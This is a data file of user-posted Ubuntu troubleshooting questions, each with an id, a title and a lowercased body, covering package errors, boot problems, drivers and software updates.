462151	recurrent problem with ubuntu vms	since 4 months ago , i have been facing the same trouble on one of my computers running windows xp where i installed a virtualbox ( version 4.3 ) where i ( re ) install several ubuntu 12.04 lts virtual machines . the ubuntu vms work very fine , but i noticed each 20 days ( in average ) the screen of the vms start to become black . i tried to fix the problem by reading similar problems posted on here and there , but they were not helpful for me . since i install only very few softwares on those vms ( python , java , php , mysql , apache server ) i decided to reinstall the vms each time their screen becomes black ( i backup my work everytime i need to shut down the vms ) . i even ended by installing only one vm on the virtualbox , but even this single vm continues to face the same problem : after a double dozen of days , its screen becomes black and i need to reinstall a new one . this is not really exhausting for me given my situation , however i am curious to know why this happens and how to fix the problem ?
462154	downloading ubuntu to mac for use on pc	can i download ubuntu on to a mac , save it to a memory stick to install on a pc and leave the mac untouched ?
462155	twitch streaming on ubuntu is n't working	so , i 've been trying to stream to twitch on ubuntu for awhile now , and i 've tried quite a few streaming scripts for ffmpeg and avconv and also simplescreenrecorder 's streaming function without success . whenever i attempt streaming , all that shows up on twitch is a `` loading video '' box at the bottom of the window and the red dot in the upper right corner stating that the stream is live . twitch recognizes my stream , and it shows up in my past broadcasts fully viewable , but it simply wo n't work in the twitch player window . while it might seem like this belongs on the twitch help forums , while looking through those i found quite a few posts with my same problem , but with no solutions . i thought maybe it was more of a problem with ubuntu/linux and that answers might be found here . thank you in advance for anyone who is willing to help here : p
462158	kde-config-tablet on ubuntu	i am a huge fan of ubuntu . i love its simplicity . however , ubuntu 's wacom configuration tool is too simple for me . i like the kde-config-tablet , but i am not comfortable with kde platforms ( i.e . kubuntu , mint kde , etc . ) as i am with ubuntu . so , is there a way to install and use kde-config-tablet in ubuntu ? i know the package is available in the software center , and i installed it , but i am unable to use it .
462162	nagios-plugin `` check_radius '' missing in ubuntu 14.04 ?	i recently updated our nagios-server from ubuntu lts 12.04.04 to 14.04 - despite i know that this migration is not supported . everything works fine but our radius-check fails ... and now i know why : the executable `` check_radius '' is missing in /usr/lib/nagios/plugins - it seems to have been deinstalled during upgrade . does anybody know why , how to get it back or to replace it ? since itâ´s an udp-protocol i canâ´t do a port check . content of /usr/lib/nagios/plugins : check_apt check_dns check_icmp check_log check_nt check_procs check_spop negate check_breeze check_dummy check_ide_smart check_mailq check_ntp check_real check_ssh urlize check_by_ssh check_file_age check_ifoperstatus check_mrtg check_ntp_peer check_rpc check_ssmtp utils.pm check_clamd check_flexlm check_ifstatus check_mrtgtraf check_ntp_time check_rta_multi check_swap utils.sh check_cluster check_fping check_imap check_mysql check_nwstat check_sensors check_tcp check_dbi check_ftp check_ircd check_mysql_query check_oracle check_simap check_time check_dhcp check_game check_jabber check_nagios check_overcr check_smb check_udp check_dig check_host check_ldap check_nntp check_pgsql check_smb_shares.pl check_ups check_disk check_hpjd check_ldaps check_nntps check_ping check_smtp check_users check_disk_smb check_http check_load check_nrpe check_pop check_snmp check_wave
462163	uninstall gnome completly from ubuntu 14.04 lts	when i installed gnome on my ubuntu 14.04 lts system , there was problem with my gui . after installing gnome there are other problems as well . if you have any idea how to uninstall gnome completely , and any idea on how to make ubuntu 14.04 lts go back to a fresh installation state , then please help me . even after i have uninstalled gnome , the problems persist .
462165	when i set desktop icons hidden i can not change wallpaper	i have ubuntu 13.10 32 bit . when i set desktop icons false , i can not change wallpaper . gsettings set org.gnome.desktop.background show-desktop-icons false when it boots up i meet a black desktop . i used to apply the same setting in ubuntu 13.04 without any problem . which settings do i miss to do what i want ?
462167	incorrect filename extension	ubuntu 14.04 . in the terminal i am often getting the message `` ignoring 'get deb.list.bck in directory 'etc/apt/sources.list.d ' as it has invalid filename extension . what is the correct extension ? .
462168	can i install two versions of libbullet ?	i use ubuntu 12.04 my error msg : sam @ sam : ~/code/pcl_standalone/vfh_dir $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libbullet the following new packages will be installed : libbullet 0 upgraded , 1 newly installed , 0 to remove and 1 not upgraded . 6 not fully installed or removed . need to get 0 b/963 kb of archives . after this operation , 2456 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 796153 files and directories currently installed . ) unpacking libbullet ( from ... /libbullet_2.80-0_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libbullet_2.80-0_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/libhacd.so.2.80 ' , which is also in package libbullet2.80 2.80.2-ubuntu1~precise1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/libbullet_2.80-0_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) sam @ sam : ~/code/pcl_standalone/vfh_dir $ how to solve it ?
462169	can not run .x86 on ubuntu 14.04	hi i tried a lot of different way to get this solved spent the whole day no luck.. i 've tried executing file as program double clicking it does n't lunch chmod +x /livecodecommunityinstaller-6_5_0-linux.x86 then ./livecodecommunityinstaller-6_5_0-linux.x86 a lot seems not to work on 14.04 and i really want to make livecode work i have to program.. thank you for your generous future understanding and comprehension of this problem .
462173	ubuntu 14.04 : ca n't change amd dpm settings ( radeon )	good morning everyone . i have recently installed ubuntu 14.04 lts ( fresh release ) and i wanted to give a serious try to the radeon drivers ( amd 280x ) . one thing i noticed for the oss drivers compared to the catalyst ones is that the fan speed is high at all times . according to most documentation online , i should be able to change settings related to it by # echo battery > /sys/class/drm/card0/device/power_dpm_state # echo low > /sys/class/drm/card0/device/power_dpm_force_performance_level but both return to me no such file or directory if i do a dmseg|grep radeon i can see the dpm is active [ 12.624293 ] [ drm ] radeon : dpm initialized what am i doing wrong ? can anyone help ? thank you !
462174	unable to boot following update to trusty , get `` nmi handler taking too long '' mesage	following my updating to 14.04 i can no longer boot into the system . i see lots of white text on a black background most of it makes no sense to me but i see `` nmi handler took too long to run '' and also `` watchdog detected hard lockup on cpu1 '' can anybody please help to restore the system to normality . thnks in anticipation .
462178	install ubuntu 13-10 in german	i have downloaded ubuntu 13.10 32 bit version and installed it . i would like to have it in the german language but dont't know how to change the language . prior to that i had the 64 bit version in german installed , but had to uninstall it because the computer ist too slow . if there is no other way , i can use it in english too , but it would be more comfortable for me to use the german language . thank for any help ! bringfried
462182	why does convert depend on the obsolete libg2c.so.0 ? how to get it to work again ?	when i try to run convert file.bmp file.jpg i get the following error message : convert : error while loading shared libraries : libg2c.so.0 : can not open shared object file : no such file or directory i tried looking for that library in synaptic , but i could not identify any package , that provides libg2c.so.0 . in how do i install libg2c on ubuntu it is stated somewhere in the comments that this library is not in the repositories since hardy . why does a standard tool like convert , that is shipped with imagemagick , depend on that library when it is not available any more ? therefore should i try to find the library and install it ? or is this tool obsolete by now ? ( why is it still in the repositories ? ) is there any workaround to using convert again ? is there any command line tool with the same functionality as an alternative ? i am running ubuntu 12.04.4 lts with xfce 4.8 inside a virtual machine .
462183	is apt-cacher capable of managing packages which are being requested by clients ?	i 'm currently experimenting with building a repository for our company . our only need is ability to control which specific packages are beeing pushed to clients . we agreed on apt-cacher . my question is if there is possibility to choose which version of package ( if there is more ) will be allowed to be downloaded . thank's
462184	missfont , something wrong with font when i log in	when i log in , the fonts are not displayed properly , and i get this file in home directory : missfont.log mktexpk -- mfmode / -- bdpi 600 -- mag 1+0/600 -- dpi 600 cmti10 mktexpk -- mfmode / -- bdpi 600 -- mag 1+0/600 -- dpi 600 cmr10 mktextfm cmti10 mktextfm cmr10 mktexpk -- mfmode / -- bdpi 600 -- mag 1+0/600 -- dpi 600 cmti10 mktexpk -- mfmode / -- bdpi 600 -- mag 1+0/600 -- dpi 600 cmr10 mktextfm cmti10 mktextfm cmr10
462185	`` libcups2 : amd64 can not be configured because libcups2 : i386 is in a different version ''	this is the output i get after issuing the command : apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : duplicity 0 upgraded , 0 newly installed , 0 to remove and 1 not upgraded . 39 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : error processing libcups2 ( -- configure ) : libcups2 : amd64 1.5.3-0ubuntu8.2 can not be configured because libcups2 : i386 is in a different version ( 1.5.3-0ubuntu8 ) dpkg : dependency problems prevent configuration of libcupsmime1 : libcupsmime1 depends on libcups2 ( > = 1.5~ ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsmime1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupscgi1 : libcupscgi1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupscgi1 ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already dpkg : error processing libtiff4 ( -- configure ) : libtiff4 : amd64 3.9.5-2ubuntu1.6 can not be configured because libtiff4 : i386 is in a different version ( 3.9.5-2ubuntu1.5 ) dpkg : dependency problems prevent configuration of libcupsimage2 : libcupsimage2 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . libcupsimage2 depends on libtiff4 ; however : package libtiff4 is not configured yet . dpkg : error processing libcupsimage2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupsppdc1 : libcupsppdc1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsppdc1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups-client : cups-client depends on libcups2 ( > = 1.5.0 ) ; however : package libcups2 is not configured yet . cups-client depends on libcupsimage2 ( > = 1.4.0 ) ; however : package libcuno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already psimage2 is not configured yet . dpkg : error processing cups-client ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups-ppdc : cups-ppdc depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . cups-ppdc depends on libcupsppdc1 ( > = 1.4.0 ) ; however : package libcupsppdc1 is not configured yet . dpkg : error processing cups-ppdc ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of cups : cups depends on libcups2 ( > = 1.5.0 ) ; however : package libcups2 is not configured yet . cups depends on libcupscgi1 ( > = 1.4.2 ) ; however : package libcupscgi1 is not configured yet . cups depends on libcupsimage2 ( > = 1.4.0 ) ; however : package libcupsimage2 is not configured yet . cups depends on libcupsmime1 ( > = 1.5.0 ) ; however : package libcupsmime1 is not configured yet . cups depends on libcupsppdc1 ( > = 1.4.0 ) ; however : package libcupsppdc1 is not configuredno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already yet . cups depends on cups-client ( > = 1.5.3-0ubuntu8.2 ) ; however : package cups-client is not configured yet . cups depends on cups-ppdc ; however : package cups-ppdc is not configured yet . dpkg : error processing cups ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgdk-pixbuf2.0-0 : libgdk-pixbuf2.0-0 depends on libtiff4 ; however : package libtiff4 is not configured yet . dpkg : error processing libgdk-pixbuf2.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk2.0-0 : libgtk2.0-0 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . libgtk2.0-0 depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . dpkg : error processing libgtk2.0-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of google-chrome-stable : google-chrome-stno apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already able depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . google-chrome-stable depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . google-chrome-stable depends on libgtk2.0-0 ( > = 2.24.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing google-chrome-stable ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libcupsdriver1 : libcupsdriver1 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . dpkg : error processing libcupsdriver1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk-3-0 : libgtk-3-0 depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . libgtk-3-0 depends on libgdk-pixbuf2.0-0 ( > = 2.25.2 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . dpkg : error processing libgtk-3-0 ( -- conno apport report written because maxreports is reached already figure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail-3-0 : libgail-3-0 depends on libgtk-3-0 ( = 3.4.2-0ubuntu0.8 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgail-3-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail18 : libgail18 depends on libgtk2.0-0 ( = 2.24.10-0ubuntu6.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgail18 ( -- configure ) : dependency problems - leaving unconfigured dpkg : error processing libmysqlclient18 ( -- configure ) : libmysqlclient18 : amd64 5.5.37-0ubuntu0.12.04.1 can not be configured because libmysqlclient18 : i386 is in a different version ( 5.5.35-0ubuntu0.12.04.2 ) dpkg : dependency problems prevent configuration of gnome-settings-daemon : gnome-settings-daemon depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . gnome-settings-daemon depends on no apport report written because maxreports is reached already libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . gnome-settings-daemon depends on libgtk-3-0 ( > = 3.3.4 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gnome-settings-daemon ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of unity-greeter : unity-greeter depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . unity-greeter depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . unity-greeter depends on gnome-settings-daemon ; however : package gnome-settings-daemon is not configured yet . dpkg : error processing unity-greeter ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of bluez-cups : bluez-cups depends on cups ; however : package cups is not configured yet . dpkg : error processing bluez-cups ( -- configure ) : dependency prno apport report written because maxreports is reached already oblems - leaving unconfigured dpkg : dependency problems prevent configuration of libgnome-control-center1 : libgnome-control-center1 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgnome-control-center1 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of deja-dup : deja-dup depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . deja-dup depends on libgnome-control-center1 ( > = 1:2.91.2 ) ; however : package libgnome-control-center1 is not configured yet . deja-dup depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing deja-dup ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-gdkpixbuf-2.0 : gir1.2-gdkpixbuf-2.0 depends on libgdk-pixbuf2.0-0 ( > = 2.25.2 ) ; however : package libgdk-pixbuf2.0-0 is not configno apport report written because maxreports is reached already ured yet . dpkg : error processing gir1.2-gdkpixbuf-2.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-gtk-2.0 : gir1.2-gtk-2.0 depends on gir1.2-gdkpixbuf-2.0 ; however : package gir1.2-gdkpixbuf-2.0 is not configured yet . gir1.2-gtk-2.0 depends on libgtk2.0-0 ( > = 2.24.0 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing gir1.2-gtk-2.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gir1.2-gtk-3.0 : gir1.2-gtk-3.0 depends on gir1.2-gdkpixbuf-2.0 ; however : package gir1.2-gdkpixbuf-2.0 is not configured yet . gir1.2-gtk-3.0 depends on libgtk-3-0 ( > = 3.3.18 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing gir1.2-gtk-3.0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gnome-control-center : gnome-control-center depends on libcups2 ( > = 1.4.0 ) ; howeno apport report written because maxreports is reached already ver : package libcups2 is not configured yet . gnome-control-center depends on libgdk-pixbuf2.0-0 ( > = 2.23.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . gnome-control-center depends on libgnome-control-center1 ( > = 1:3.3.5 ) ; however : package libgnome-control-center1 is not configured yet . gnome-control-center depends on libgtk-3-0 ( > = 3.3.6 ) ; however : package libgtk-3-0 is not configured yet . gnome-control-center depends on gnome-settings-daemon ( > = 3.3.91 ) ; however : package gnome-settings-daemon is not configured yet . dpkg : error processing gnome-control-center ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gwibber-service : gwibber-service depends on gir1.2-gdkpixbuf-2.0 ; however : package gir1.2-gdkpixbuf-2.0 is not configured yet . dpkg : error processing gwibber-service ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgwibber2 : libgwibber2 depends on gwibber-service ( > = 2.31.1 ) ; however : package gwibber-service is not configured yet . dpkg : error processing libgwibber2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgwibber-gtk2 : libgwibber-gtk2 depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . libgwibber-gtk2 depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . libgwibber-gtk2 depends on libgwibber2 ( > = 3.3.90 ) ; however : package libgwibber2 is not configured yet . dpkg : error processing libgwibber-gtk2 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gwibber : gwibber depends on gir1.2-gtk-3.0 ; however : package gir1.2-gtk-3.0 is not configured yet . gwibber depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . gwibber depends on libgwibber-gtk2 ( > = 3.1.4.1+r1119 ) ; howevno apport report written because maxreports is reached already er : package libgwibber-gtk2 is not configured yet . gwibber depends on libgwibber2 ( > = 3.1.4.1 ) ; however : package libgwibber2 is not configured yet . gwibber depends on gwibber-service ( = 3.4.2-0ubuntu2.4 ) ; however : package gwibber-service is not configured yet . dpkg : error processing gwibber ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gwibber-service-facebook : gwibber-service-facebook depends on gwibber-service ( > > 2.33.0 ) ; however : package gwibber-service is not configured yet . dpkg : error processing gwibber-service-facebook ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of gwibber-service-identica : gwibber-service-identica depends on gwibber-service ( > > 2.33.0 ) ; however : package gwibber-service is not configured yet . dpkg : error processing gwibber-service-identica ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems preveno apport report written because maxreports is reached already nt configuration of gwibber-service-twitter : gwibber-service-twitter depends on gwibber-service ( > > 2.33.0 ) ; however : package gwibber-service is not configured yet . dpkg : error processing gwibber-service-twitter ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgail-common : libgail-common depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) ; however : package libgdk-pixbuf2.0-0 is not configured yet . libgail-common depends on libgail18 ( = 2.24.10-0ubuntu6.1 ) ; however : package libgail18 is not configured yet . dpkg : error processing libgail-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk-3-bin : libgtk-3-bin depends on libgtk-3-0 ( > = 3.4.2-0ubuntu0.8 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing libgtk-3-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libgtk2.0-bin : libgtk2.0-bin depends on libgtk2.0-0 ( > = 2.24.10-0ubuntu6.1 ) ; however : package libgtk2.0-0 is not configured yet . dpkg : error processing libgtk2.0-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of update-manager : update-manager depends on gir1.2-gtk-3.0 ; however : no apport report written because maxreports is reached already package gir1.2-gtk-3.0 is not configured yet . dpkg : error processing update-manager ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of vino : vino depends on libgtk-3-0 ( > = 3.0.0 ) ; however : package libgtk-3-0 is not configured yet . dpkg : error processing vino ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of cups-bsd : cups-bsd depends on libcups2 ( > = 1.4.0 ) ; however : package libcups2 is not configured yet . cups-bsd depends on cups-client ( = 1.5.3-0ubuntu8.2 ) ; however : package cups-client is not configured yet . dpkg : error processing cups-bsd ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libcups2 libcupsmime1 libcupscgi1 libtiff4 libcupsimage2 libcupsppdc1 cups-client cups-ppdc cups libgdk-pixbuf2.0-0 libgtk2.0-0 google-chrome-stable libcupsdriver1 libgtk-3-0 libgail-3-0 libgail18 libmysqlclient18 gnome-settings-daemon unity-greeter bluez-cups libgnome-control-center1 deja-dup gir1.2-gdkpixbuf-2.0 gir1.2-gtk-2.0 gir1.2-gtk-3.0 gnome-control-center gwibber-service libgwibber2 libgwibber-gtk2 gwibber gwibber-service-facebook gwibber-service-identica gwibber-service-twitter libgail-common libgtk-3-bin libgtk2.0-bin update-manager vino cups-bsd e : sub-process /usr/bin/dpkg returned an error code ( 1 )
462187	cp - can not create regular file : permission denied	i want copy to /lib/udev but gives error cp -f /tmp/ok_pcscd_hotplug.sh /lib/udev cp : can not create regular file /lib/udev/ok_pcscd_hotplug : permission denied i am root , but i ca n't understand . what can i do ?
462190	what does simply giving path in shell script means ?	i 'm going through a shell script coded by some old folks working on my current project . at the end of a file , it simple have the folder/file paths like , /home/udhay-dev/work/udhay/bin/rm-vhosts /home/udhay-dev/work/udhay/bin/vhosts /home/udhay-dev/work/udhay/bin/apache at the end of file . when these lines are executing , it throws vhost.sh : line 22 : /home/udhay-dev/work/udhay/bin/rm-vhosts : is a directory vhost.sh : line 23 : /home/udhay-dev/work/udhay/bin/vhosts : permission denied vhost.sh : line 24 : /home/udhay-dev/work/udhay/bin/apache : is a directory but i do n't have any idea on these since i 'm almost new to both ubuntu and shell script . what would be the reason or purpose for simply having those lines in a shell script ? please help .
462195	get lvds display information	question : is it possible to get system information from an lvds display ? i need a max-resolution , a serial number or anything else that is unique . situation : i have two setups which are exactly the same ( ubuntu 12.04 ) with one difference : setup one : 1024x768 on a 10 inch lvds display . setup two : 1024x768 on a 15 inch lvds display . i need to automatically make settings depending on the screen size .
462197	find files with a specific 2-line pattern using awk	i have a few hundreds of files that has this pattern @ < tripos > atom 2 h18 65.2220 du 1 res1 0.0000 @ < tripos > bond 1 3 5 ar @ < tripos > substructure among them , some of the files are missing the line after the @ < tripos > bond and they look like @ < tripos > atom 2 h18 65.2220 du 1 res1 0.0000 @ < tripos > bond @ < tripos > substructure i 'm trying to find all the files in my working directory that are missing the numeric line after the @ < tripos > bond and move them to another directory . i know this is a simple task , but i am quite new to linux . note : the files vary in length and line numbers , this is why i am `` grepping '' the line after the @ < tripos > bond string . here 's one of my codes , which i was planning to write in a for loop . it does n't do the job , but i am showing it to show one of my trials . cat file | grep -a1 ' @ < tripos > bond ' | awk 'fnr == 2 { print } ' thank you
462199	ca n't enter windows after re-installing ubuntu 14 grub	i know there are a lot of threads with this problem , but still i ca n't find one that can actually help me . i was running ubuntu 14.04 lts on a dual-boot with the preinstalled windows 8.1 that came with my laptop . the thing is that i was messing around with the launcher interface ( you know the cube thing and all that graphical stuff ) and i wanted to go back , so i reinstalled ubuntu with a live usb . there was an option that saids `` erase ubuntu and reisntall it '' so i obviously picked that one . everything installed ok , and i am currently running ubuntu . but the dual-boot screen at start was n't showing ok ... ( there was something like a black canvas on it ) so i was n't able to select any option from that screen , and was booting directly on ubuntu . i did a lil research and found the boot reapir stuff , so i did it , and then i was able to see the options at boot screen ( grub i think it is called ) but there was no windows option . so i basically ca n't enter on windows . another thing i noticed is that the hard drive does n't have the 40gb that were supposed to have ( because it was a partition i had made on windows for it ) instead , it has way too much rom on it , ( almost the whole drive wich is a terabyte ) and i am really scared that the process had deleted all my windows and my stuff . so here is the url that the boot repair gave to me when finished http : //paste2.org/nxwgz7y4 i hope you guys can help me out here . i am really new into ubuntu so its kind of an unknown path for me to walk . note : excuse my english skills , i hope you can understand what i wanted to say . thank you !
462200	emacs key inserting problem	i recently upgraded to ubuntu 14.04 and since then i started to have a weird problem with my emacs . when i type the ° character ( which maps to dead_abovering on my keyboard ) it inserts the sequence ä° ( ⇧° a is incidentally how you get the letter ­ä on my keyboard ) . when i run emacs under emacs -- no-init the problem persists , but when i run emacs -nw it goes away . and i have n't found any other application that demonstrates this odd behavior , so it seams to be only a problem with my graphical implementation of emacs .
462202	postgis + could not access file `` $ libdir/postgis-2.1 '' : no such file or directory	i am running postgresql9.3 and postgis2.1 , it works fine . when i installed qgis by using the following commands : sudo apt-get update sudo apt-get install qgis after installing qgis the postgis is not working . when i tried to execute a spatial query , it shows error : could not access file `` $ libdir/postgis-2.1 '' : no such file or directory so i uninstalled qgis , but now also i get the same error . i searched a lot regarding this , i cant find the solution . help me to solve this . thanks in advance..
462208	error in installing ssh via apt to my system	when i was attempting to install the ssh via apt to my host system , the following error occurs . reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/ph.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-i386_packages e : the package lists or status file could not be parsed or opened . how may i correct and install the ssh apt to my system ?
462217	trusty software updater does not propose updates from trusty-updates	i have since one week upgraded several pc to ubuntu 14.04 trusty tahr . i got several updates via the software updater , but i do n't get updates from trusty-updates , although this repository is selected in the settings dialog : { here was a nice screenshot of the dialog showing : x important security updates ( trusty-security ) x recommended updates ( trusty-updates ) o pre-released updates ( trusty-proposed ) x unsupported updates ( trusty-backports ) automatically check for updates : daily where there are security updates : display immediately where there are other udpates : display weekly notify me of a new ubuntu version : for long-term support versions } there are however several updates available : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : compiz compiz-core compiz-gnome compiz-plugins compiz-plugins-default compiz-plugins-main-default compizconfig-backend-gconf compizconfig-settings-manager gir1.2-nautilus-3.0 gir1.2-rb-3.0 libcompizconfig0 libdecoration0 libgexiv2-2 libido3-0.1-0 libnautilus-extension1a librhythmbox-core8 libselinux1 libselinux1 : i386 libselinux1-dev nautilus nautilus-data python-compizconfig python3-update-manager rhythmbox rhythmbox-data rhythmbox-mozilla rhythmbox-plugin-cdrecorder rhythmbox-plugin-magnatune rhythmbox-plugin-zeitgeist rhythmbox-plugins update-manager update-manager-core 32 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . i did not test them all , but all of which i tested come from trusty-updates : $ apt-cache policy compiz nautilus update-manager compiz : installed : 1:0.9.11+14.04.20140409-0ubuntu1 candidate : 1:0.9.11+14.04.20140423-0ubuntu1 version table : 1:0.9.11+14.04.20140423-0ubuntu1 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages *** 1:0.9.11+14.04.20140409-0ubuntu1 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status nautilus : installed : 1:3.10.1-0ubuntu8 candidate : 1:3.10.1-0ubuntu9 version table : 1:3.10.1-0ubuntu9 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages *** 1:3.10.1-0ubuntu8 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status update-manager : installed : 1:0.196.11 candidate : 1:0.196.12 version table : 1:0.196.12 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty-updates/main amd64 packages *** 1:0.196.11 0 500 http : //be.archive.ubuntu.com/ubuntu/ trusty/main amd64 packages 100 /var/lib/dpkg/status updates from trusty-security are done however . so i do n't know if that 's a bug or something i misconfigured ? [ update ] : to answer comment below , i have some warnings / errors in ~/.cache/software-center/ as of today . warnings like 'warning : main : no data , and even one error - trying to repair db failed . but they do n't reproduce afterwards . also , one of the package is compiz . i went to check the changelog on launchpad , and noticed the following history page : https : //launchpad.net/ubuntu/trusty/amd64/compiz . it says `` phased updates '' , `` 40 % of users '' . could this be linked to that ? is there a way to bypass this phased updates when using the software updater ( as when using apt-get ) ?
